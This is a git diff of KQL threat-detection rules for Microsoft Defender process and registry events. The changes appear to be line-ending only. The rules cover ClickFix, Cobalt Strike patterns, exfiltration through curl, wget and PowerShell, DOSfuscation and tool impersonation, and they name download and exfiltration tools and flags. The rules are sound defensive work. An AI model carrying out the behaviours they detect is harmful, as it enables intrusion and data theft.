diff --git a/KQL/rules/Execution/php_inline_command_execution.kql b/KQL/rules/Execution/php_inline_command_execution.kql
index 4ed236fa..18fd54fa 100644
--- a/KQL/rules/Execution/php_inline_command_execution.kql
+++ b/KQL/rules/Execution/php_inline_command_execution.kql
@@ -1,10 +1,10 @@
-// Title: Php Inline Command Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-02
-// Level: medium
-// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Php Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -r" and (FolderPath endswith "\\php.exe" or ProcessVersionInfoOriginalFileName =~ "php.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql b/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql
index 0c8438aa..a225d904 100644
--- a/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql
+++ b/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potential Arbitrary Command Execution Via FTP.EXE
-// Author: Victor Sergeev, oscd.community
-// Date: 2020-10-09
-// Level: medium
-// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Potential Arbitrary Command Execution Via FTP.EXE
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:" or ProcessCommandLine contains "–s:" or ProcessCommandLine contains "—s:" or ProcessCommandLine contains "―s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql
index bc0b587e..250390c8 100644
--- a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql
+++ b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Arbitrary File Download Via Cmdl32.EXE
-// Author: frack113
-// Date: 2021-11-03
-// Level: medium
-// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
-// Attackers can abuse this utility in order to download arbitrary files via a configuration file.
-// Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
-
-DeviceProcessEvents
+// Title: Potential Arbitrary File Download Via Cmdl32.EXE
+// Author: frack113
+// Date: 2021-11-03
+// Level: medium
+// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
+// Attackers can abuse this utility in order to download arbitrary files via a configuration file.
+// Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql
index 0c0de02c..a8fb2192 100644
--- a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql
+++ b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql
@@ -1,12 +1,12 @@
-// Title: Potential Binary Impersonating Sysinternals Tools
-// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2021-12-20
-// Level: medium
-// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection.
-// This rule looks for the execution of binaries that are named similarly to Sysinternals tools.
-// Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, attack.t1036.005
-
-DeviceProcessEvents
+// Title: Potential Binary Impersonating Sysinternals Tools
+// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2021-12-20
+// Level: medium
+// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection.
+// This rule looks for the execution of binaries that are named similarly to Sysinternals tools.
+// Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, attack.t1036.005
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\accesschk64a.exe" or FolderPath endswith "\\ADExplorer64a.exe" or FolderPath endswith "\\ADInsight64a.exe" or FolderPath endswith "\\adrestore64a.exe" or FolderPath endswith "\\Autologon64a.exe" or FolderPath endswith "\\Autoruns64a.exe" or FolderPath endswith "\\autorunsc64a.exe" or FolderPath endswith "\\Clockres64a.exe" or FolderPath endswith "\\Contig64a.exe" or FolderPath endswith "\\Coreinfo64a.exe" or FolderPath endswith "\\Dbgview64a.exe" or FolderPath endswith "\\disk2vhd64a.exe" or FolderPath endswith "\\diskext64a.exe" or FolderPath endswith "\\DiskView64a.exe" or FolderPath endswith "\\du64a.exe" or FolderPath endswith "\\FindLinks64a.exe" or FolderPath endswith "\\handle64a.exe" or FolderPath endswith "\\hex2dec64a.exe" or FolderPath endswith "\\junction64a.exe" or FolderPath endswith "\\LoadOrd64a.exe" or FolderPath endswith "\\LoadOrdC64a.exe" or FolderPath endswith "\\logonsessions64a.exe" or FolderPath endswith "\\movefile64a.exe" or FolderPath endswith "\\notmyfault64a.exe" or FolderPath endswith "\\notmyfaultc64a.exe" or FolderPath endswith "\\pendmoves64a.exe" or FolderPath endswith "\\pipelist64a.exe" or FolderPath endswith "\\procdump64a.exe" or FolderPath endswith "\\procexp64a.exe" or FolderPath endswith "\\Procmon64a.exe" or FolderPath endswith "\\PsExec64a.exe" or FolderPath endswith "\\psfile64a.exe" or FolderPath endswith "\\PsGetsid64a.exe" or FolderPath endswith "\\PsInfo64a.exe" or FolderPath endswith "\\pskill64a.exe" or FolderPath endswith "\\psloglist64a.exe" or FolderPath endswith "\\pspasswd64a.exe" or FolderPath endswith "\\psping64a.exe" or FolderPath endswith "\\PsService64a.exe" or FolderPath endswith "\\pssuspend64a.exe" or FolderPath endswith "\\RAMMap64a.exe" or FolderPath endswith "\\RegDelNull64a.exe" or FolderPath endswith "\\ru64a.exe" or 
FolderPath endswith "\\sdelete64a.exe" or FolderPath endswith "\\sigcheck64a.exe" or FolderPath endswith "\\streams64a.exe" or FolderPath endswith "\\strings64a.exe" or FolderPath endswith "\\sync64a.exe" or FolderPath endswith "\\Sysmon64a.exe" or FolderPath endswith "\\tcpvcon64a.exe" or FolderPath endswith "\\tcpview64a.exe" or FolderPath endswith "\\vmmap64a.exe" or FolderPath endswith "\\whois64a.exe" or FolderPath endswith "\\Winobj64a.exe" or FolderPath endswith "\\ZoomIt64a.exe") or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith 
"\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith 
"\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RAMMap64.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or 
FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe")) and (not(((isnull(ProcessVersionInfoCompanyName) or isnull(ProcessVersionInfoProductName)) or ((ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals")) or ProcessVersionInfoProductName startswith "Sysinternals"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql b/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql
index 77221f2c..f1fc8453 100644
--- a/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql
+++ b/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Binary Proxy Execution Via Cdb.EXE
-// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-10-26
-// Level: medium
-// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1106, attack.defense-evasion, attack.t1218, attack.t1127
-// False Positives:
-// - Legitimate use of debugging tools
-
-DeviceProcessEvents
+// Title: Potential Binary Proxy Execution Via Cdb.EXE
+// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1106, attack.defense-evasion, attack.t1218, attack.t1127
+// False Positives:
+// - Legitimate use of debugging tools
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql
index faf42fc6..1f7552b1 100644
--- a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql
+++ b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql
@@ -1,15 +1,15 @@
-// Title: Potential ClickFix Execution Pattern - Registry
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-03-25
-// Level: high
-// Description: Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.
-// ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.
-// Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,
-// such as one-liners that execute remotely hosted malicious files or scripts.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.001
-// False Positives:
-// - Legitimate applications using RunMRU with HTTP links
-
-DeviceRegistryEvents
+// Title: Potential ClickFix Execution Pattern - Registry
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-03-25
+// Level: high
+// Description: Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.
+// ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.
+// Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,
+// such as one-liners that execute remotely hosted malicious files or scripts.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.001
+// False Positives:
+// - Legitimate applications using RunMRU with HTTP links
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "http://" or RegistryValueData contains "https://") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*" and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql b/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql
index cc093543..b77923f8 100644
--- a/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql
+++ b/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql
@@ -1,10 +1,10 @@
-// Title: Potential CobaltStrike Process Patterns
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-07-27
-// Level: high
-// Description: Detects potential process patterns related to Cobalt Strike beacon activity
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Potential CobaltStrike Process Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-27
+// Level: high
+// Description: Detects potential process patterns related to Cobalt Strike beacon activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and (InitiatingProcessCommandLine contains "cmd.exe /C echo" and InitiatingProcessCommandLine contains " > \\\\.\\pipe")) or (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and InitiatingProcessCommandLine endswith "/C whoami") or (ProcessCommandLine endswith "cmd.exe /C whoami" and InitiatingProcessFolderPath startswith "C:\\Temp\\") or ((ProcessCommandLine contains "cmd.exe /c echo" and ProcessCommandLine contains "> \\\\.\\pipe") and (InitiatingProcessFolderPath endswith "\\runonce.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql b/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql
index 99339f41..7f970e5e 100644
--- a/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql
+++ b/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential CommandLine Path Traversal Via Cmd.EXE
-// Author: xknow @xknow_infosec, Tim Shelton
-// Date: 2020-06-11
-// Level: high
-// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003
-// False Positives:
-// - Java tools are known to produce false-positive when loading libraries
-
-DeviceProcessEvents
+// Title: Potential CommandLine Path Traversal Via Cmd.EXE
+// Author: xknow @xknow_infosec, Tim Shelton
+// Date: 2020-06-11
+// Level: high
+// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Java tools are known to produce false-positive when loading libraries
+
+DeviceProcessEvents
 | where (((InitiatingProcessCommandLine contains "/c" or InitiatingProcessCommandLine contains "/k" or InitiatingProcessCommandLine contains "/r") or (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/k" or ProcessCommandLine contains "/r")) and (InitiatingProcessFolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "cmd.exe") and (InitiatingProcessCommandLine =~ "/../../" or ProcessCommandLine contains "/../../")) and (not(ProcessCommandLine contains "\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_cookies_session_hijacking.kql b/KQL/rules/Execution/potential_cookies_session_hijacking.kql
index 5744e7cb..04d151e4 100644
--- a/KQL/rules/Execution/potential_cookies_session_hijacking.kql
+++ b/KQL/rules/Execution/potential_cookies_session_hijacking.kql
@@ -1,10 +1,10 @@
-// Title: Potential Cookies Session Hijacking
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-07-27
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Potential Cookies Session Hijacking
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine matches regex "\\s-c\\s" or ProcessCommandLine contains "--cookie-jar") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql b/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql
index 56d074aa..e61428b7 100644
--- a/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql
+++ b/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql
@@ -1,12 +1,12 @@
-// Title: Potential Data Exfiltration Activity Via CommandLine Tools
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-02
-// Level: high
-// Description: Detects the use of various CLI utilities exfiltrating data via web requests
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Data Exfiltration Activity Via CommandLine Tools
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects the use of various CLI utilities exfiltrating data via web requests
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" and ProcessCommandLine contains " -me" and ProcessCommandLine contains " -b" and ProcessCommandLine contains " POST ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or ((ProcessCommandLine contains "--ur" and FolderPath endswith "\\curl.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " --data ")) or ((ProcessCommandLine contains "--post-data" or ProcessCommandLine contains "--post-file") and FolderPath endswith "\\wget.exe")) and ((ProcessCommandLine matches regex "net\\s+view" or ProcessCommandLine matches regex "sc\\s+query") or (ProcessCommandLine contains "Get-Content" or ProcessCommandLine contains "GetBytes" or ProcessCommandLine contains "hostname" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "ipconfig" or 
ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "qprocess" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "ToBase64String" or ProcessCommandLine contains "whoami") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > " and ProcessCommandLine contains " C:\\"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql
index 12744408..611e3534 100644
--- a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql
+++ b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql
@@ -1,14 +1,14 @@
-// Title: Potential DLL Injection Via AccCheckConsole
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-01-06
-// Level: medium
-// Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI.
-// One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc.
-// The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.threat-hunting
-// False Positives:
-// - Legitimate use of the UI Accessibility Checker
-
-DeviceProcessEvents
+// Title: Potential DLL Injection Via AccCheckConsole
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-06
+// Level: medium
+// Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI.
+// One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc.
+// The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+// - Legitimate use of the UI Accessibility Checker
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -hwnd" or ProcessCommandLine contains " -process " or ProcessCommandLine contains " -window ") and (FolderPath endswith "\\AccCheckConsole.exe" or ProcessVersionInfoOriginalFileName =~ "AccCheckConsole.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_dosfuscation_activity.kql b/KQL/rules/Execution/potential_dosfuscation_activity.kql
index e4dd8aca..204f0363 100644
--- a/KQL/rules/Execution/potential_dosfuscation_activity.kql
+++ b/KQL/rules/Execution/potential_dosfuscation_activity.kql
@@ -1,10 +1,10 @@
-// Title: Potential Dosfuscation Activity
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-02-15
-// Level: medium
-// Description: Detects possible payload obfuscation via the commandline
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Potential Dosfuscation Activity
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-15
+// Level: medium
+// Description: Detects possible payload obfuscation via the commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "^^" or ProcessCommandLine contains "^|^" or ProcessCommandLine contains ",;," or ProcessCommandLine contains ";;;;" or ProcessCommandLine contains ";; ;;" or ProcessCommandLine contains "(,(," or ProcessCommandLine contains "%COMSPEC:~" or ProcessCommandLine contains " c^m^d" or ProcessCommandLine contains "^c^m^d" or ProcessCommandLine contains " c^md" or ProcessCommandLine contains " cm^d" or ProcessCommandLine contains "^cm^d" or ProcessCommandLine contains " s^et " or ProcessCommandLine contains " s^e^t " or ProcessCommandLine contains " se^t "
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql b/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql
index 84081c5a..abc4ecbe 100644
--- a/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql
+++ b/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql
@@ -1,12 +1,12 @@
-// Title: Potential Dropper Script Execution Via WScript/CScript
-// Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects wscript/cscript executions of scripts located in user directories
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007
-// False Positives:
-// - Some installers might generate a similar behavior. An initial baseline is required
-
-DeviceProcessEvents
+// Title: Potential Dropper Script Execution Via WScript/CScript
+// Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
